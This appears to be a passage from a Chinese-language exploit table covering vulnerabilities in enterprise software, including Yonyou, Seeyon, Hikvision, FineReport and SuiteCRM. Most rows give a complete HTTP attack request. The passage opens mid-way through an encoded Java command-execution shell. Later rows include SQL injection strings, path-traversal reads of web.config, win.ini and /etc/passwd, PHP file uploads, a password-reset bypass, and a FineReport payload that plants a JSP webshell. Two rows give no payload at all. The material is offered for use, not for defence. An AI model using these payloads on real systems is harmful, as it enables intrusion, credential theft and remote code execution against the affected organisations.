0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0077\u0072\u0061\u0070\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0073\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0074\u0072\u0075\u0065\u003b\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0069\u0066\u0020\u0028\u0066\u006c\u0061\u0067\u0029\u0020\u007b\u0020\u0062\u0072\u0065\u0061\u006b\u003b\u0020\u007d\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0020\u007d&modelName=test |
| 赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞 | GET /BaseModule/SysLog/ReadTxtLog?FileName=../web.config HTTP/1.1 Host: Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: __RequestVerificationToken=EXiOGTuudShJEzYLR8AQgWCZbF2NB6_KXKrmqJJyp1cgyV6_LYy9yKQhNkHJGXXlbO_6NLQZPwUUdVZKH6e9KMuXyxV6Tg-w5Ftx-mKih3U1; ASP.NET_SessionId=2ofwed0gd2jc4paj0an0hpcl Priority: u=0, i User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 |
| 赛蓝企业管理系统GetJSFile存在任意文件读取漏洞 | GET /Utility/GetJSFile?filePath=../web.config HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close |
| 指尖云平台-智慧政务payslip SQL注入漏洞 | GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: GOASESSID=i589f58naalabocmbidup7edl3 Upgrade-Insecure-Requests: 1 |
| 致远AnalyticsCloud 分析云存在任意文件读取漏洞 | GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive |
| SuiteCRM responseEntryPoint存在SQL注入漏洞 | GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<“+UNION+SELECT+SLEEP(5);–+-&type=c&response=accept HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip Connection: close |
| 用友NC querygoodsgridbycode存在SQL注入漏洞 | GET /ecp/productonsale/querygoodsgridbycode.json?code=1%27%29+AND+9976%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT+%28CASE+WHEN+%289976%3D9976%29+THEN+1+ELSE+0+END%29+FROM+DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28118%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%29–+dpxi HTTP/1.1 Host: Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Pragma: no-cache Accept-Language: zh-CN,zh;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Cache-Control: no-cache |
| 云课网校系统uploadImage存在任意文件上传漏洞 | POST /api/uploader/uploadImage HTTP/1.1 Host: xx.xx.xx.xx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarykvjj6DIn0LIXxe9m x-requested-with: XMLHttpRequest ——WebKitFormBoundaryLZbmKeasWgo2gPtU <?php phpinfo();?> |
| 帆软FineReport全版本被曝viewReportSever 0day注入 | GET /webroot/decision/view/ReportServer?test=ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss&n=${__fr_locale__=sql(‘FRDemo’,DECODE(‘%ef%bb%bf%61%74%74%61%63%68%0C%64%61%74%61%62%61%73%65%20%27%2F%68%6F%6D%65%2F%46%44%4C%2F%74%6F%6D%63%61%74%2D%6C%69%6E%75%78%2F%77%65%62%61%70%70%73%2F%77%65%62%72%6F%6F%74%2F%68%65%6C%70%2F%74%31%36%32%36%35%39%34%2E%6A%73%70%27%20%61%73%20%27%74%31%36%32%36%35%39%34%27%3B’),1,1)}${__fr_locale__=sql(‘FRDemo’,DECODE(‘%ef%bb%bf%63%72%65%61%74%65%0C%74%61%62%6C%65%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%20%74%65%78%74%29%3B’),1,1)}${__fr_locale__=sql(‘FRDemo’,DECODE(‘%ef%bb%bf%49%4E%53%45%52%54%0C%69%6E%74%6F%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%29%20%56%41%4C%55%45%53%20%28%27%3C%25%43%6C%61%73%73%20%73%61%66%65%20%3D%20%43%6C%61%73%73%2E%66%6F%72%4E%61%6D%65%28%22%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%22%29%3B%6A%61%76%61%2E%6C%61%6E%67%2E%72%65%66%6C%65%63%74%2E%46%69%65%6C%64%20%73%61%66%65%43%6F%6E%20%3D%20%73%61%66%65%2E%67%65%74%44%65%63%6C%61%72%65%64%46%69%65%6C%64%28%22%74%68%65%55%6E%22%20%2B%20%22%73%61%66%65%22%29%3B%73%61%66%65%43%6F%6E%2E%73%65%74%41%63%63%65%73%73%69%62%6C%65%28%74%72%75%65%29%3B%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%20%75%6E%53%61%66%65%20%3D%20%28%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%29%20%73%61%66%65%43%6F%6E%2E%67%65%74%28%6E%75%6C%6C%29%3B%62%79%74%65%5B%5D%20%64%61%74%61%42%79%74%65%73%20%3D%20%6A%61%76%61%78%2E%78%6D%6C%2E%62%69%6E%64%2E%44%61%74%61%74%79%70%65%43%6F%6E%76%65%72%74%65%72%2E%70%61%72%73%65%42%61%73%65%36%34%42%69%6E%61%72%79%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%64%61%74%61%22%29%29%3B%75%6E%53%61%66%65%2E%64%65%66%69%6E%65%41%6E%6F%6E%79%6D%6F%75%73%43%6C%61%73%73%28%6A%61%76%61%2E%69%6F%2E%46%69%6C%65%2E%63%6C%61%73%73%2C%20%64%61%74%61%42%79%74%65%73%2C%20%6E%75%6C%6C%29%2E%6E%65%77%49%6E%73%74%61%6E%63%65%28%29%3B%25%3E%27%29%3B’),1,1)} HTTP/1.1 host: xxxx connection: close content-type: application/x-www-form-urlencoded x-forwarded-for: xxxx accept-encoding: gzip, deflate user-agent: python-requests/2.31.0 accept: */* |
| 网神SecSSL3600安全接入网关系统任意密码修改漏洞 | POST /changepass.php?type=2 HTTP/1.1 host: Cookie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={“this_name”:”test”,”subAuthId”:”1″} old_pass=&password=Test123!@&repassword=Test123!@ |
| 广联达OA接口ArchiveWebService存在XML实体注入漏洞 | POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host: Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: “http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo” <?xml version=”1.0″ encoding=”utf-8″?> |
| WebLogic远程代码执行漏洞(CVE-2024-21006) | github自己搜 |
| JeecgBoot SQL注入漏洞 | 未知 |
| 用友U8 CRM import.php文件上传 | POST /crmtools/tools/import.php?DontCheckLogin=1&issubmit=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Content-Length: 277 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarye0z8QbHs79gL8vW5 Upgrade-Insecure-Requests: 1 ——WebKitFormBoundarye0z8QbHs79gL8vW5 <?php phpinfo();?> help.php |
| 用友U8Cloud ActionServlet SQL注入 | GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasQueryConditionFrameAction&method=doCopy&TableSelectedID=1 HTTP/1.1 Host: 地址 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 |
| 天清汉马vpn任意文件读取 | /vpn/user/download/client?ostype=../../../../../../../etc/passwd |
| 万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞 | POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 DBSTEP V3.0 145 0 105 DBSTEP=REJTVEVQ |
| 海康威视综合安防管理平台detection存在前台远程命令执行漏洞 | POST /center/api/installation/detection HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/json;charset=UTF-8 { |
| 数字通指尖云平台-智慧政务payslip SQL注入漏洞 | GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=(SELECT 4050 FROM(SELECT COUNT(*),CONCAT((mid((ifnull(cast(current_user() as nchar),0x20)),1,54)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: GOASESSID=i589f58naalabocmbidup7edl3 Upgrade-Insecure-Requests: 1 |
| 福建科立讯通信 指挥调度管理平台ajax_users存在SQL注入漏洞 | POST /app/ext/ajax_users.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded dep_level=1′) UNION ALL SELECT NULL,CONCAT(0x7e,md5(123456),0x7e),NULL,NULL,NULL– – |
| 万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞 | /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1 |
